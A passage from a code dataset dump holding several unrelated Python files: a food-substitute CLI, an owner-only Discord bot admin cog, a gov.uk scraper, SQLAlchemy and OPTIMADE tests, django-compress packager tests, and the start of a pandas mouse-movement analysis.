Back to start\")\n\n\n#section replace a food\ndef showCategoryMenuChoice():\n print(\"\\n1: Select a category\")\n print(\"2: Back to start\")\n print(\"0: Quit\\n\")\n\n\ndef getCategoryMenuChoice():\n ok = False\n choice = None\n while(not ok):\n try:\n choice = int(input(\"Do your choice :\"))\n except ValueError:\n print(\"The number entered is wrong...\")\n\n if (choice in (1, 2, 0)):\n ok = True\n else:\n print(\"The choice must be a number within 1, 2 or 0\")\n ok = False\n return choice\n\n\n#sub menu select a category\ndef showCategoriesList(engine):\n \"\"\"display the list of all categories\"\"\"\n #connect to the db\n connection = engine.connect()\n Session = sessionmaker(bind=engine)\n session = Session()\n #query the db about categories\n for category in session.query(Categories):\n print(\"{} : {}\".format(category.id, category.name))\n\n connection.close()\n\n\ndef getCategoryNumberChoice(maxCategories):\n \"\"\"take the user category choosen\"\"\"\n ok = False\n choice = None\n while (not ok):\n try:\n choice = int(input(\"Enter the category number: \"))\n except ValueError:\n print(\"The number entered is wrong\")\n\n if(choice in range(1, maxCategories)):\n ok = True\n else:\n print(\"Please, the number must be in 1 to {}\\n\".\n format(maxCategories))\n ok = False\n return choice\n\n\n#sub sub menu select a food\n\ndef makePage(data):\n \"\"\"Function that permit to slice all the foods of categorie\n by table of 20 \"\"\"\n nbPage = data.count() // 20\n if data.count() % 20 is not 0:\n nbPage += 1\n if data.count() < 20:\n nbPage = 1\n first, last, step, pageList = 0, 20, 20, list()\n for i in range(nbPage):\n if i is not (nbPage - 1):\n #intermediary page\n pageList.append(data[first: last])\n else:\n #the last page\n pageList.append(data[first:]) # append the data left\n first += step\n last += step\n return pageList\n\n\ndef printFoods(pageList, pageNum):\n print(\"=\" * 50)\n for elt in pageList[pageNum - 1]:\n print(\"{}: {}\".format(elt.id, elt.name))\n print(\" \" * 40, end=\" \")\n print(\"Page {} on {}\".format(pageNum, len(pageList)))\n print(\"=\" * 50)\n\n\ndef showFoodsMenu():\n print(\"\\n1: Choose a food on this page\")\n print(\"2: Visit another page\")\n print(\"0: Quit\\n\")\n\n\ndef showFoodsMenu2():\n print(\"\\n1: Choose a food\")\n print(\"0: Quit\\n\")\n\n\ndef getFoodsMenuChoice():\n ok = False\n while(not ok):\n try:\n choice = int(input(\"Do your choice :\"))\n except ValueError:\n print(\"The number entered is wrong...\")\n\n if (choice in (1, 2, 0)):\n ok = True\n else:\n print(\"The choice must be a number within 1, 2 or 0\")\n ok = False\n return choice\n\n\ndef getFoodsMenuChoice2():\n ok = False\n while(not ok):\n try:\n choice = int(input(\"Do your choice :\"))\n except ValueError:\n print(\"The number entered is wrong...\")\n\n if (choice in (1, 0)):\n ok = True\n else:\n print(\"The choice must be a number within 1, 2 or 0\")\n ok = False\n return choice\n\n\ndef getFoodsPage(maxPage):\n ok = False\n choice = None\n while (not ok):\n try:\n choice = int(input(\"Enter the page number: \"))\n except ValueError:\n print(\"The number entered is not an integer\")\n\n if(choice in range(1, maxPage+1)):\n ok = True\n else:\n print(\"This page do not exist, please try again\")\n ok = False\n return choice\n\n\ndef getFoodsNumber(maxFoods):\n ok = False\n choice = None\n while (not ok):\n try:\n choice = int(input(\"Enter the food number: \"))\n except ValueError:\n print(\"The number entered is not an integer\")\n\n if(choice > 0 and choice <= maxFoods):\n ok = True\n else:\n print(\"Number must be positive; try again\")\n ok = False\n return choice\n\n\ndef chooseFood(engine, categoryNumber, maxFoods):\n #connect to the db\n connection = engine.connect()\n Session = sessionmaker(bind=engine)\n session = Session()\n #query the db about foods of given category\n foodsAll = session.query(Foods).filter(Foods.categories_id ==\n categoryNumber)\n #slice the result in multiple pages\n pageList = makePage(foodsAll)\n #print the first food page of the category\n printFoods(pageList, 1)\n #display the food menu\n showFoodsMenu()\n #take the user choice\n foodsMenuChoice = getFoodsMenuChoice()\n\n if(foodsMenuChoice is 1):\n #choose a food on the first page\n foodNumber = getFoodsNumber(maxFoods)\n #query the db about this food id\n if session.query(exists().where(Foods.id == foodNumber)).scalar():\n food = session.query(Foods).filter(Foods.id == foodNumber).first()\n print(food)\n #display a subtitute of the food\n print(\"Here is a substitute:\")\n #query the db about foods on the same category\n #where nutrion grade are better than the selected food\n if bool(session.query(Foods).\n filter(Foods.nutrition_grade <= food.nutrition_grade).\n filter(Foods.categories_id == categoryNumber)):\n subFoods = session.query(Foods).\\\n filter(Foods.categories_id == categoryNumber).\\\n filter(Foods.nutrition_grade <= food.nutrition_grade).all()\n subFoodIndex = randrange(len(subFoods))\n subFood = subFoods[subFoodIndex]\n print(subFood)\n addInDb = input(\"Save the food ? (y/n)\")\n if(addInDb in (\"Y\", \"y\")):\n myFood = MyFoods()\n myFood.food_id = food.id\n myFood.food_substitute_id = subFood.id\n\n session.add(myFood)\n print(\"Food saved...\")\n session.commit()\n else:\n print(\"Food not saved !\")\n else:\n print(\"No better substitute found...\")\n elif(foodsMenuChoice is 2):\n #choose a food on other page\n otherPage, choice = True, None\n while(otherPage):\n foodPage = getFoodsPage(len(pageList))\n printFoods(pageList, foodPage)\n choice = input(\"\\nOther page ? (y/n):\")\n if choice in (\"Y\", \"y\"):\n otherPage = True\n else:\n otherPage = False\n showFoodsMenu2()\n foodsMenuChoice2 = getFoodsMenuChoice2()\n if(foodsMenuChoice2 is 1):\n #choose a food on the selected page\n foodNumber = getFoodsNumber(maxFoods)\n #query the db about this food id\n if session.query(exists().where(Foods.id == foodNumber)).scalar():\n food = session.query(Foods).filter(Foods.id == foodNumber).first()\n print(food)\n #display a subtitute of the food\n print(\"Here is a substitute:\")\n #query the db about foods on the same category\n #where nutrion grade are better than the selected food\n if bool(session.query(Foods).\n filter(Foods.nutrition_grade <= food.nutrition_grade).\n filter(Foods.categories_id == categoryNumber)):\n subFoods = session.query(Foods).\\\n filter(Foods.categories_id == categoryNumber).\\\n filter(Foods.nutrition_grade <= food.nutrition_grade)\n subFoodIndex = randrange(len(subFoods.all()))\n subFood = subFoods.all()[subFoodIndex]\n print(subFood)\n addInDb = input(\"Save the two foods ? (y/n)\")\n if(addInDb in (\"Y\", \"y\")):\n myFood = MyFoods()\n myFood.food_id = food.id\n myFood.food_substitute_id = subFood.id\n\n session.add(myFood)\n session.commit()\n\n print(\"Food saved...\")\n else:\n print(\"Food not saved !\")\n else:\n print(\"No better substitute found...\")\n else:\n print(\"Returning to the start...\\n\")\n else:\n print(\"Returning to the start...\\n\")\n #close the connection\n connection.close()\n\n\ndef showFavoritesFoods(engine, detailled=False):\n connection = engine.connect()\n Session = sessionmaker(bind=engine)\n session = Session()\n #query the db about favorites foods saved\n q = session.query(Foods).join(MyFoods.food).all() +\\\n session.query(Foods).join(MyFoods.food_substitute).all()\n for food in q:\n print(\"-\" * 50)\n if(detailled):\n print(food)\n else:\n print(food.name)\n print(\"-\" * 50)\n connection.close()\n\n\ndef run():\n MAX_FOODS = maxFoods()\n mainLoop = True\n while(mainLoop):\n subLoop = True\n showStartMenu()\n startMenuChoice = getStartMenuChoice()\n while(subLoop):\n if(startMenuChoice is 1):\n showCategoriesList(engine)\n showCategoryMenuChoice()\n categoryMenuChoice = getCategoryMenuChoice()\n if(categoryMenuChoice is 1):\n categoryNumber = getCategoryNumberChoice(MAX_FOODS_CAT)\n chooseFood(engine, categoryNumber, MAX_FOODS)\n else:\n #go back to the start menu\n subLoop = False\n elif(startMenuChoice is 2):\n sectionLoop = True\n while(sectionLoop):\n showSavedFoodsMenu()\n choice = getStartMenuChoice()\n if choice is 1:\n print(\"\\n\\nYour favorites foods name list : \\n\")\n showFavoritesFoods(engine)\n elif choice is 2:\n print(\"\\n\\nYour favorites foods list detailled :\\n\")\n showFavoritesFoods(engine, True)\n else:\n sectionLoop = False\n subLoop = False\n else:\n print(\"Bye...\")\n subLoop = False\n mainLoop = False\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"140865570","text":"from traceback import format_exc\nfrom asyncio import iscoroutine\nfrom aiohttp import ClientSession\nfrom discord import Member, Message\nfrom discord.ext.commands import command, Context, group\nfrom cogs.utils.custom_bot import CustomBot\nfrom cogs.utils.family_tree.family_tree_member import FamilyTreeMember\n\n\nclass CalebOnly(object):\n '''\n The parentage cog\n Handles the adoption of parents\n '''\n\n def __init__(self, bot:CustomBot):\n self.bot = bot\n self.last_tree = None\n self.stream = None # May be channel/ID\n\n\n async def __local_check(self, ctx:Context):\n return ctx.author.id == self.bot.config['owner']\n\n\n @property\n def stream_channel(self):\n channel_id = self.bot.config['stream_channel']\n channel = self.bot.get_channel(channel_id)\n return channel\n\n\n @command()\n async def send(self, ctx:Context, *, content:str):\n '''\n Sends content to the current stream channel\n '''\n\n if self.stream == None:\n await ctx.send(\"No stream currently set up.\")\n return\n await self.stream.send(content)\n\n\n @command(aliases=['cs'])\n async def channelstream(self, ctx:Context, channel_id:int=None):\n '''\n Streams a channel's output to the chat log\n '''\n\n if channel_id == None:\n self.stream = None\n await ctx.send(\"Cleared stream.\")\n return\n self.stream = self.bot.get_channel(channel_id)\n # self.stream = channel\n await ctx.send(f\"Channel set to `{self.stream.name}` (`{self.stream.id}`)\")\n\n\n async def on_message(self, message:Message):\n '''\n Log streamed messages to channel\n '''\n\n if not message.channel:\n return\n if not self.stream:\n return\n if not self.stream_channel:\n return\n if message.channel.id == self.stream.id:\n attachments = [i.url for i in message.attachments]\n if message.content:\n text = f\"**Streamed Message** | User: `{message.author!s}` (`{message.author.id}`)\\nContent: `{message.content}`\"\n else:\n text = f\"**Streamed Message** | User: `{message.author!s}` (`{message.author.id}`)\\nNo text content in message.\"\n if attachments:\n text += '\\nAttachments: ' + ', '.join(attachments)\n await self.stream_channel.send(text) \n\n\n @command()\n async def ev(self, ctx:Context, *, content:str):\n '''\n Runs some text through Python's eval function\n '''\n\n try:\n ans = eval(content, globals(), locals())\n except Exception as e:\n await ctx.send('```py\\n' + format_exc() + '```')\n return\n if iscoroutine(ans):\n ans = await ans\n await ctx.send('```py\\n' + str(ans) + '```')\n\n\n @command(aliases=['rld'])\n async def reload(self, ctx:Context, *cog_name:str):\n '''\n Unloads a cog from the bot\n '''\n\n self.bot.unload_extension('cogs.' + '_'.join([i for i in cog_name]))\n try:\n self.bot.load_extension('cogs.' + '_'.join([i for i in cog_name]))\n except Exception as e:\n await ctx.send('```py\\n' + format_exc() + '```')\n return\n await ctx.send('Cog reloaded.')\n\n\n @command()\n async def runsql(self, ctx:Context, *, content:str):\n '''\n Runs a line of SQL into the sparcli database\n '''\n\n async with self.bot.database() as db:\n x = await db(content) or 'No content.'\n if type(x) in [str, type(None)]:\n await ctx.send(x)\n return\n\n # Get the results into groups\n column_headers = list(x[0].keys())\n grouped_outputs = {}\n for i in column_headers:\n grouped_outputs[i] = []\n for guild_data in x:\n for i, o in guild_data.items():\n grouped_outputs[i].append(str(o))\n\n # Everything is now grouped super nicely\n # Now to get the maximum length of each column and add it as the last item\n for key, item_list in grouped_outputs.items():\n max_len = max([len(i) for i in item_list + [key]])\n grouped_outputs[key].append(max_len)\n\n # Format the outputs and add to a list\n key_headers = []\n temp_output = []\n for key, value in grouped_outputs.items():\n # value is a list of unformatted strings\n key_headers.append(format(key, '<' + str(value[-1])))\n formatted_values = [format(i, '<' + str(value[-1])) for i in value[:-1]]\n # string_value = '|'.join(formatted_values)\n temp_output.append(formatted_values)\n key_string = '|'.join(key_headers)\n\n # Rotate the list because apparently I need to\n output = []\n for i in range(len(temp_output[0])):\n temp = []\n for o in temp_output:\n temp.append(o[i])\n output.append('|'.join(temp))\n\n # Add some final values before returning to the user\n line = '-' * len(key_string)\n output = [key_string, line] + output \n string_output = '\\n'.join(output)\n await ctx.send('```\\n{}```'.format(string_output))\n\n\n @group()\n async def profile(self, ctx:Context):\n '''\n A parent group for the different profile commands\n '''\n\n pass\n\n\n @profile.command(aliases=['username'])\n async def name(self, ctx:Context, *, username:str):\n '''\n Lets you change the username of the bot\n '''\n\n if len(username) > 32:\n await ctx.send('That username is too long to be compatible with Discord.')\n return \n\n await self.bot.user.edit(username=username)\n await ctx.send('Done.')\n\n\n @profile.command(aliases=['photo', 'image', 'avatar'])\n async def picture(self, ctx:Context, *, image_url:str=None):\n '''\n Lets you change the username of the bot\n '''\n\n if image_url == None:\n try:\n image_url = ctx.message.attachments[0].url \n except IndexError:\n await ctx.send(\"You need to provide an image.\")\n return\n\n async with ClientSession(loop=self.bot.loop) as session:\n async with session.get(image_url) as r:\n image_content = await r.read()\n await self.bot.user.edit(avatar=image_content)\n await ctx.send('Done.')\n\n\ndef setup(bot:CustomBot):\n x = CalebOnly(bot)\n bot.add_cog(x)\n\n\n","sub_path":"cogs/caleb_only.py","file_name":"caleb_only.py","file_ext":"py","file_size_in_byte":6598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"323186813","text":"# Appendix C4 - content_importer.py\n\nfrom .db_handler import DBHandler\nfrom .tables import Document\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\n\n# Future implementation: Tuning features by adding Documents' to their content. Maybe with a multiplier.\nclass ContentImporter(object):\n def __init__(self, db_name=\"klassify\"):\n self.DBH = DBHandler(db_name, echo=False)\n self.ROOT_URL = \"https://www.gov.uk\"\n self.NON_RELEVANT_PHRASES = [\n \"Skip to main content\",\n \"Find out more about cookies\"\n \"GOV.UK uses cookies to make the site simpler\",\n \"Is there anything wrong with this page\",\n \"Last updated\",\n \"Other ways to apply\",\n \"Before you start\",\n \"Elsewhere on the web\",\n \"Find out about call charges\",\n \"find out more about beta services\",\n \"Return to top ↑\",\n \"Find out more about cookies\",\n \"GOV.UK\",\n \"Don’t include personal or financial information\",\n \"Help us improve\",\n \"This file may not be suitable for users of assistive technology\"\n \"If you use assistive technology and need a version of this document in a more accessible format\",\n \"tell us what format you need It will help us if you say what assistive technology you use\",\n \"Request a different format\",\n \"What you were doing\",\n \"What went wrong\",\n \"uses cookies to make the site simpler.\"\n ]\n\n def parse_page(self, page):\n soup = BeautifulSoup(page, 'html.parser')\n return soup\n\n def extract_page_content(self, page):\n return page.text\n\n # Iterate through each Document in the database, get their URL on the site and\n # query it to obtain their HTML and eventually store it.\n def import_documents_html(self):\n documents = self.DBH.session.query(Document).all()\n\n count = 0\n for doc in documents:\n if doc.html == None:\n time.sleep(0.75)\n doc.html = requests.get(doc.web_url).text\n self.DBH.session.commit()\n count += 1\n if count % 250 == 0: print(\"Documents processed: %d/%d\" %(count, len(documents)))\n\n # Iterate through the Documents' HTML, parse it and store it.\n def extract_documents_content(self):\n documents = self.DBH.session.query(Document).all()\n\n count = 0\n for doc in documents:\n doc.content = self.extract_content(doc)\n self.DBH.session.commit()\n count += 1\n if count % 250 == 0: print(\"Documents processed: %d/%d\" %(count, len(documents)))\n\n def extract_content(self, document):\n page = self.parse_page(document.html)\n page = self.remove_unwanted_tags(page)\n page = self.get_body(page)\n\n page_content = self.extract_page_content(page)\n page_content = self.remove_non_relevant_content(page_content)\n page_content = self.remove_punctuaction_and_numbers(page_content)\n return page_content\n\n def get_body(self, page):\n return page.body\n\n # Discard anything inside footer, header and scripts\n def remove_unwanted_tags(self, page):\n for tag in page.find_all(['footer', 'script', 'header']):\n tag.replace_with('')\n\n return page\n\n def remove_non_relevant_content(self, page):\n for phrase in self.NON_RELEVANT_PHRASES:\n page = page.replace(phrase, \"\")\n return page\n\n def remove_punctuaction_and_numbers(self, page):\n punctuation = [ '\\\\', '>', '_', '`', '{', ']', '*', '[',\n '^', '+', '!', '(', ':', ';', \"'\", \"’\",\n '<', '|', '\"', '?', '=', '}', '&', '/',\n '$', ')', '~', '#', '%', ',' ]\n page = ''.join(ch for ch in page if ch not in punctuation)\n page = ''.join([i for i in page if not i.isdigit()])\n return page\n","sub_path":"src/content_importer.py","file_name":"content_importer.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"78763049","text":"# -*- coding: utf-8 -*-\nimport pytest\nimport time\nimport datetime\n\nfrom io import StringIO\nfrom codecs import open\n\nfrom sqlalchemy import event, Table\nfrom sqlalchemy.ext.declarative.api import DeclarativeMeta\nfrom sqlalchemy.exc import IntegrityError, OperationalError, ProgrammingError\nfrom sqlalchemy.orm.util import object_state\nfrom collections import OrderedDict\n\nfrom oar.lib import fixture\nfrom oar.lib.database import Database, SessionProperty, QueryProperty\n\nfrom oar.lib.utils import to_json, to_unicode, json\n\nfrom .. import assert_raises\n\n\nclass EngineListener(object):\n\n def __init__(self, engine, ignored=('PRAGMA')):\n self.engine = engine\n self.ignored = ignored\n self.buf = StringIO()\n\n @event.listens_for(engine, \"before_cursor_execute\")\n def before_cursor_execute(conn, cursor, statement,\n parameters, context, executemany):\n sql = to_unicode(statement)\n for string in self.ignored:\n if sql.lower().startswith(string.lower()):\n return\n sql = sql.replace(' \\n', '\\n').rstrip('\\n')\n self.buf.write(sql.rstrip('\\n') + \";\" + '\\n')\n\n @property\n def raw_sql(self):\n self.buf.seek(0)\n return self.buf.getvalue().replace('\\t', ' ')\\\n .rstrip('\\n')\n\n\n@pytest.fixture(scope='function')\ndef db(request):\n db = Database(uri='sqlite://')\n\n association_table = db.Table(\n 'association',\n db.Column('movie_id', db.Integer, db.ForeignKey('movie.id')),\n db.Column('actor_id', db.Integer, db.ForeignKey('actor.id'))\n )\n\n class Movie(db.Model):\n __table_args__ = (\n db.UniqueConstraint('title', name='uix_1'),\n {'sqlite_autoincrement': True},\n )\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(20))\n\n class Actor(db.DeferredReflectionModel):\n __table_args__ = (\n db.Index('name', 'lastname', 'firstname'),\n db.UniqueConstraint('firstname', 'lastname', name='uix_1')\n )\n\n id = db.Column(db.Integer, primary_key=True)\n firstname = db.Column(db.String(20))\n lastname = db.Column(db.String(20))\n birthday = db.Column(db.DateTime, nullable=False,\n default=datetime.datetime.utcnow)\n movies = db.relationship(\"Movie\",\n secondary=association_table,\n backref=\"actors\")\n return db\n\n\ndef test_sqlite_schema(db):\n engine_listener = EngineListener(db.engine)\n db.create_all()\n\n expected_schemas = \"\"\"\nCREATE TABLE movie (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n title VARCHAR(20) NOT NULL,\n CONSTRAINT uix_1 UNIQUE (title)\n);\n\nCREATE TABLE actor (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n firstname VARCHAR(20) NOT NULL,\n lastname VARCHAR(20) NOT NULL,\n birthday DATETIME NOT NULL,\n CONSTRAINT uix_1 UNIQUE (firstname, lastname)\n);\nCREATE INDEX name ON actor (lastname, firstname);\n\nCREATE TABLE association (\n movie_id INTEGER NOT NULL,\n actor_id INTEGER NOT NULL,\n FOREIGN KEY(movie_id) REFERENCES movie (id),\n FOREIGN KEY(actor_id) REFERENCES actor (id)\n);\"\"\"\n for schema in expected_schemas.split(';'):\n assert schema.strip() in engine_listener.raw_sql\n\n\ndef test_model_args(db):\n db.create_all()\n assert db['actor'].name == \"actor\"\n index_columns = list(list(db['actor'].indexes)[0].columns)\n assert index_columns[0].name == \"lastname\"\n assert index_columns[1].name == \"firstname\"\n\n\ndef test_collected_tables_and_models(db):\n db.create_all()\n model_names = ('Actor', 'Movie')\n table_names = ('actor', 'movie', 'association')\n for model_name in model_names:\n assert model_name in db\n assert isinstance(db[model_name], DeclarativeMeta)\n\n for table_name in table_names:\n assert table_name in db\n assert isinstance(db[table_name], Table)\n\n with assert_raises(KeyError):\n db['totototo']\n\n\ndef test_deferred_reflection(db):\n db.create_all()\n db.op.add_column('actor', db.Column('salary', db.Integer,\n nullable=True,\n default=1000000))\n db.reflect()\n db['Actor'].create(firstname=\"Ben\", lastname=\"Affleck\", salary=12000000)\n affleck = db['Actor'].query.first()\n keys = list(OrderedDict(affleck).keys())\n assert affleck.salary == 12000000\n assert ['id', 'firstname', 'lastname', 'birthday', 'salary'] == keys\n\n\ndef test_db_api_create_and_delete_all(db):\n db.create_all()\n db.reflect()\n dicaprio = db['Actor'].create(firstname=\"Leonardo\", lastname=\"DiCaprio\")\n ruffalo = db['Actor'].create(firstname=\"Mark\", lastname=\"Ruffalo\")\n shutter_island = db['Movie'].create(title=\"Shutter Island\")\n shutter_island.actors.append(dicaprio)\n shutter_island.actors.append(ruffalo)\n\n dicaprio = db['Actor'].query.filter_by(firstname=\"Leonardo\").first()\n assert dicaprio.lastname == \"DiCaprio\"\n assert dicaprio.movies[0].actors[0] is dicaprio\n assert dicaprio.movies[0].actors[1] is ruffalo\n\n with assert_raises(IntegrityError):\n db['Actor'].create(firstname=\"Leonardo\", lastname=\"DiCaprio\")\n\n db.delete_all()\n assert db['Actor'].query.count() == 0\n assert db['Movie'].query.count() == 0\n assert len(db.session.execute(db['association'].select()).fetchall()) == 0\n\n\ndef test_db_api_to_dict_json(db):\n db.create_all()\n db.reflect()\n Actor, Movie = db['Actor'], db['Movie']\n dt = datetime.datetime(2015, 7, 19, 9, 14, 22, 140921)\n a1 = Actor.create(firstname=\"Leonardo\", lastname=\"DiCaprio\", birthday=dt)\n a2 = Actor.create(firstname=\"Mark\", lastname=\"Ruffalo\")\n m1 = Movie.create(title=\"Shutter Island\")\n m1.actors.append(a1)\n m1.actors.append(a2)\n\n item = Actor.query.filter_by(firstname=\"Leonardo\").first()\n item_dict = OrderedDict([('id', 1),\n ('firstname', 'Leonardo'),\n ('lastname', 'DiCaprio'),\n ('birthday', dt)])\n assert item.to_dict() == item_dict\n expected_json = \"\"\"\n{\n \"id\": 1,\n \"firstname\": \"Leonardo\",\n \"lastname\": \"DiCaprio\",\n \"birthday\": \"2015-07-19T09:14:22.140921\"\n}\"\"\".strip()\n assert item.to_json() == expected_json\n assert to_json(item) == expected_json\n\n\ndef test_db_api_others(db):\n assert repr(db) == \"\"\n db.create_all()\n assert repr(db) == \"\"\n assert db.metadata == db.Model.metadata\n movie = db['Movie'].create(title=\"Mad Max\")\n assert repr(movie) == \"\"\n\n assert db.query(db['Movie']).first().title == \"Mad Max\"\n assert db.dialect == \"sqlite\"\n\n\ndef test_db_api_add(db):\n db.create_all()\n movie = db['Movie'](title=\"Mad Max\")\n db.add(movie)\n assert db['Movie'].query.first().title == \"Mad Max\"\n\n\ndef test_db_api_rollback(db):\n db.create_all()\n movie = db['Movie'](title=\"Mad Max\")\n db.add(movie)\n db.rollback()\n assert db['Movie'].query.first() is None\n\n\ndef test_db_api_flush(db):\n db.create_all()\n movie = db['Movie'](title=\"Mad Max\")\n db.add(movie)\n assert object_state(movie).pending is True\n db.flush()\n assert object_state(movie).persistent is True\n db.commit()\n\n\ndef test_db_api_close(db):\n assert db.connector is None\n db.create_all()\n db['Movie'].create(title=\"Mad Max\")\n db.add(db['Movie'](title=\"Mad Max\"))\n assert db.connector is not None\n session = db.session\n assert session.new\n db.close()\n assert db.connector is None\n assert not session.new\n\n\ndef test_internal_operations(db):\n assert isinstance(Database.session, SessionProperty)\n assert Database.Model is None\n assert Database.query_class is None\n assert Database.query_collection_class is None\n assert isinstance(db.Model.query, QueryProperty)\n\n\ndef test_load_fixtures(db, tmpdir):\n ts = int(time.time())\n\n db.create_all()\n\n db.op.add_column(\n table_name='actor',\n column=db.Column('start_time', db.Integer, nullable=True),\n )\n\n db.reflect()\n db.__time_columns__ = [\"start_time\"]\n\n Actor, Movie = db['Actor'], db['Movie']\n a1 = Actor.create(firstname=\"Leonardo\", lastname=\"DiCaprio\", start_time=ts)\n a2 = Actor.create(firstname=\"Mark\", lastname=\"Ruffalo\", start_time=ts)\n m1 = Movie.create(title=\"Shutter Island\")\n m1.actors.append(a1)\n m1.actors.append(a2)\n\n assert Actor.query.order_by(Actor.id).first().start_time == ts\n\n filepath = tmpdir.join('fixtures.json').strpath\n fixture.dump_fixtures(db, filepath, ref_time=ts)\n\n data = {}\n with open(filepath, 'r', encoding='utf-8') as fd:\n data = json.load(fd)\n\n assert data['metadata']['ref_time'] == ts\n\n fixture.load_fixtures(db, filepath, clear=True, ref_time=None)\n assert Actor.query.order_by(Actor.id).first().start_time == ts\n\n fixture.load_fixtures(db, filepath, clear=True, ref_time=(ts - 10))\n assert Actor.query.order_by(Actor.id).first().start_time == (ts - 10)\n\n with assert_raises(IntegrityError):\n fixture.load_fixtures(db, filepath)\n\n\n@pytest.mark.skipif(\"os.environ.get('DB_TYPE', '') == 'memory'\",\n reason=\"need persistent database\")\ndef test_read_only_session():\n from oar.lib import db\n lenght = len(db['Resource'].query.all())\n if db.dialect == \"sqlite\":\n exception = OperationalError\n else:\n exception = ProgrammingError\n with assert_raises(exception):\n with db.session(read_only=True):\n assert len(db['Resource'].query.all()) == lenght\n db['Resource'].create()\n len(db['Resource'].query.all()) == lenght\n","sub_path":"tests/lib/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"9331659","text":"# pylint: disable=relative-beyond-top-level,import-outside-toplevel\nimport os\nimport unittest\nfrom traceback import print_exc\n\nfrom optimade.validator import ImplementationValidator\n\nfrom .utils import SetClient\n\n\nclass ServerTestWithValidator(SetClient, unittest.TestCase):\n\n server = \"regular\"\n\n def test_with_validator(self):\n validator = ImplementationValidator(client=self.client)\n try:\n validator.main()\n except Exception:\n print_exc()\n self.assertTrue(validator.valid)\n\n\nclass IndexServerTestWithValidator(SetClient, unittest.TestCase):\n\n server = \"index\"\n\n def test_with_validator(self):\n validator = ImplementationValidator(client=self.client, index=True)\n try:\n validator.main()\n except Exception:\n print_exc()\n self.assertTrue(validator.valid)\n\n\ndef test_mongo_backend_package_used():\n import pymongo\n import mongomock\n from optimade.server.entry_collections import client\n\n force_mongo_env_var = os.environ.get(\"OPTIMADE_CI_FORCE_MONGO\", None)\n if force_mongo_env_var is None:\n return\n\n if int(force_mongo_env_var) == 1:\n assert issubclass(client.__class__, pymongo.MongoClient)\n elif int(force_mongo_env_var) == 0:\n assert issubclass(client.__class__, mongomock.MongoClient)\n else:\n raise Exception(\n \"The environment variable OPTIMADE_CI_FORCE_MONGO cannot be parsed as an int.\"\n )\n\n\nclass AsTypeTestsWithValidator(SetClient, unittest.TestCase):\n\n server = \"regular\"\n\n def test_as_type_with_validator(self):\n\n test_urls = {\n \"http://example.org/v0/structures\": \"structures\",\n \"http://example.org/v0/structures/mpf_1\": \"structure\",\n \"http://example.org/v0/references\": \"references\",\n \"http://example.org/v0/references/dijkstra1968\": \"reference\",\n \"http://example.org/v0/info\": \"info\",\n \"http://example.org/v0/links\": \"links\",\n }\n with unittest.mock.patch(\n \"requests.get\", unittest.mock.Mock(side_effect=self.client.get)\n ):\n for url, as_type in test_urls.items():\n validator = ImplementationValidator(\n base_url=url, as_type=as_type, verbosity=5\n )\n try:\n validator.main()\n except Exception:\n print_exc()\n self.assertTrue(validator.valid)\n","sub_path":"tests/server/test_server_validation.py","file_name":"test_server_validation.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"35910963","text":"import os\n\nfrom django.test import TestCase\n\nfrom compress.conf import settings\nfrom compress.packager import Packager\n\n\nclass PackagerTest(TestCase):\n def setUp(self):\n self.old_compress_url = settings.COMPRESS_URL\n settings.COMPRESS_URL = 'http://localhost/static/'\n\n def test_individual_url(self):\n \"\"\"Check that individual URL is correctly generated\"\"\"\n packager = Packager()\n filename = os.path.join(settings.COMPRESS_ROOT, u'js/application.js')\n individual_url = packager.individual_url(filename)\n self.assertEqual(individual_url,\n \"http://localhost/static/js/application.js\")\n\n def test_external_urls(self):\n packager = Packager()\n packages = packager.create_packages({\n 'jquery': {\n 'external_urls': ('//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js',)\n },\n 'application': {\n 'source_filenames': ('js/application.js',),\n 'output_filename': 'application.r?.js'\n }\n })\n self.assertEqual(packages, {\n 'jquery': {\n 'externals': ('//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js',)\n },\n 'application': {\n 'context': {},\n 'output': 'application.r?.js',\n 'paths': ['js/application.js']\n }\n })\n\n def tearDown(self):\n settings.COMPRESS_URL = self.old_compress_url\n","sub_path":"tests/tests/packager.py","file_name":"packager.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651258466","text":"import pandas as pd\nimport numpy as np\nimport time\n\nmouse = pd.read_csv(\"G:/Inputs/6 month/PH00313.txt\", header=36, sep=\";\", na_values=[\"-\", \"cm\", \"cm?\", \"s\", \"s?\", \"cm/s\", \"cm/s?\"])\nMovFrame = mouse[[\"Recording time\", \"Distance moved\"]]\ndel mouse\nMovFrame = MovFrame.drop(MovFrame.index[0])\nMovFrame = MovFrame.reset_index()\ndel MovFrame[\"index\"]\nMovFrame[\"Distance moved\"][0] = 0\nMovFrame[\"Distance moved\"][MovFrame[\"Distance moved\"] < 2] = 0\nMovFrame[\"Velocity\"] = MovFrame[\"Distance moved\"] / 0.066\nsize = len(MovFrame)\ninterval = 1\noutputrange = int(MovFrame[\"Recording time\"][size-1] / interval)\noutputarray1 = np.zeros(outputrange)\noutputarray2 = np.zeros(outputrange)\nrangeStart = 0\nrangeEnd = rangeStart + interval\n\nstartTime = time.time()\t\nMoving = MovFrame[(MovFrame[\"Recording time\"] > 0) & (MovFrame[\"Recording time\"] < 1)]\nMoving = Moving.reset_index()\ndel Moving[\"index\"]\nVelocityChange = Moving[\"Velocity\"][len(Moving)-1] - Moving[\"Velocity\"][0]\noutputarray2[0] = VelocityChange / interval\nrangeStart = rangeStart + interval\nrangeEnd = 